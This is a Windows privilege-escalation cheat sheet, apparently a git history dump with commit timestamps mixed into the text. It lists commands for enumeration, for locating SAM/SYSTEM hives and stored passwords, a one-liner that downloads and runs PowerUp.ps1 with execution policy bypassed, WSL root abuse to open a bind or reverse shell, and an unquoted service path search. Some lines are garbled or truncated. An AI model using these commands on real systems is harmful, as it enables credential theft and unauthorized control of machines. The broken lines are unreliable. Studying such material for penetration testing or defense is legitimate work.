2018-05-20 20:10:33 +00:00
# Windows - Privilege Escalation
## Windows Version and Configuration
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
2018-12-25 14:19:45 +00:00
wmic qfe
2018-05-20 20:10:33 +00:00
```
Architecture
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
```
List all env variables
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
set
2018-12-25 14:19:45 +00:00
Get-ChildItem Env: | ft Key,Value
2018-05-20 20:10:33 +00:00
```
List all drives
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
wmic logicaldisk get caption || fsutil fsinfo drives
2018-12-25 14:19:45 +00:00
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
2018-05-20 20:10:33 +00:00
```
## User Enumeration
Get current username
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
echo %USERNAME% || whoami
2018-12-25 14:19:45 +00:00
$env:username
```
List user privilege
```powershell
whoami /priv
2018-05-20 20:10:33 +00:00
```
List all users
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net user
2018-12-25 14:19:45 +00:00
net users
2018-05-20 20:10:33 +00:00
whoami /all
2018-12-25 14:19:45 +00:00
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
2018-05-20 20:10:33 +00:00
```
List logon requirements; useable for bruteforcing
2018-08-12 21:30:22 +00:00
2018-12-25 14:19:45 +00:00
```powershell$env:usernadsc
2018-05-20 20:10:33 +00:00
net accounts
```
Get details about a user (i.e. administrator, admin, current user)
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net user administrator
net user admin
net user %USERNAME%
```
List all local groups
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net localgroup
2018-12-25 14:19:45 +00:00
Get-LocalGroup | ft Name
2018-05-20 20:10:33 +00:00
```
Get details about a group (i.e. administrators)
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net localgroup administrators
2018-12-25 14:19:45 +00:00
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
2018-05-20 20:10:33 +00:00
```
## Network Enumeration
2018-12-25 14:19:45 +00:00
List all network interfaces, IP, and DNS.
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
ipconfig /all
2018-12-25 14:19:45 +00:00
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
2018-05-20 20:10:33 +00:00
```
List current routing table
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
route print
2018-12-25 14:19:45 +00:00
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
2018-05-20 20:10:33 +00:00
```
List the ARP table
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
arp -A
2018-12-25 14:19:45 +00:00
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
2018-05-20 20:10:33 +00:00
```
List all current connections
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
netstat -ano
```
List firware state and current configuration
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
netsh advfirewall firewall dump
```
List all network shares
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net share
```
2018-12-25 14:19:45 +00:00
SNMP Configuration
```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
2018-05-20 20:10:33 +00:00
## Looting for passwords
2018-12-25 14:19:45 +00:00
### SAM and SYSTEM files
```powershell
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```
2018-07-08 18:03:40 +00:00
### Search for file contents**
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
cd C:\ & findstr /SI /M "password" *.xml * .ini *.txt
2018-12-25 14:19:45 +00:00
findstr /si password *.xml * .ini *.txt * .config
2018-05-20 20:10:33 +00:00
```
2018-07-08 18:03:40 +00:00
### Search for a file with a certain filename
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
dir /S /B *pass* .txt == *pass* .xml == *pass* .ini == *cred* == *vnc* == *.config*
```
2018-07-08 18:03:40 +00:00
### Search the registry for key names
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
```
2018-07-08 18:03:40 +00:00
### Read a value of a certain sub key
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
```
2018-12-22 23:45:45 +00:00
### Passwords in unattend.xml
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
Location of the unattend.xml files
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
```powershell
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```
2018-07-08 18:03:40 +00:00
Example content
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
```powershell
2018-08-12 21:30:22 +00:00
< component name = "Microsoft-Windows-Shell-Setup" publicKeyToken = "31bf3856ad364e35" language = "neutral" versionScope = "nonSxS" processorArchitecture = "amd64" >
2018-05-27 20:27:31 +00:00
< AutoLogon >
< Password > *SENSITIVE*DATA*DELETED*< / Password >
2018-08-12 21:30:22 +00:00
< Enabled > true< / Enabled >
< Username > Administrateur< / Username >
2018-05-27 20:27:31 +00:00
< / AutoLogon >
< UserAccounts >
< LocalAccounts >
< LocalAccount wcm:action = "add" >
< Password > *SENSITIVE*DATA*DELETED*< / Password >
< Group > administrators;users< / Group >
< Name > Administrateur< / Name >
< / LocalAccount >
< / LocalAccounts >
< / UserAccounts >
```
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
2018-12-25 14:19:45 +00:00
### IIS Web config
```powershell
Get-Childitem – Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```
## Processes Enumeration and Tasks
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
What processes are running?
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
tasklist /v
2018-12-25 14:19:45 +00:00
net start
sc query
Get-Service
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost* "} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
2018-05-20 20:10:33 +00:00
```
Which processes are running as "system"
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
tasklist /v /fi "username eq system"
```
Do you have powershell magic?
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
```
2018-12-25 14:19:45 +00:00
List installed programs
```powershell
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```
Scheduled tasks
```powershell
schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
Startup tasks
```powershell
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
```
2018-12-22 23:45:45 +00:00
## Using PowerSploit's PowerUp
2018-05-20 20:10:33 +00:00
2018-12-22 23:45:45 +00:00
Spot the weak service using PowerSploit's PowerUp
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
2018-12-22 23:45:45 +00:00
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
2018-05-20 20:10:33 +00:00
```
2018-12-22 23:45:45 +00:00
## Using Windows Subsystem for Linux (WSL)
2018-08-12 21:30:22 +00:00
2018-12-22 23:45:45 +00:00
Technique borrowed from [Warlockobama's tweet ](https://twitter.com/Warlockobama/status/1067890915753132032 )
2018-05-20 20:10:33 +00:00
2018-12-22 23:45:45 +00:00
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
2018-12-22 23:45:45 +00:00
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
2018-05-20 20:10:33 +00:00
```
2018-12-25 14:19:45 +00:00
## Unquoted Service Paths
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
```powershell
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte ](https://addaxsoft.com/wpecs/ )
* [Basic Linux Privilege Escalation ](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ )
2018-07-08 18:03:40 +00:00
* [Windows Privilege Escalation Fundamentals ](http://www.fuzzysecurity.com/tutorials/16.html )
* [TOP– 10 ways to boost your privileges in Windows systems - hackmag ](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/ )
2018-12-22 23:45:45 +00:00
* [The SYSTEM Challenge ](https://decoder.cloud/2017/02/21/the-system-challenge/ )
2018-12-25 14:19:45 +00:00
* [Windows Privilege Escalation Guide - absolomb's security blog ](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ )
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell ](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/ )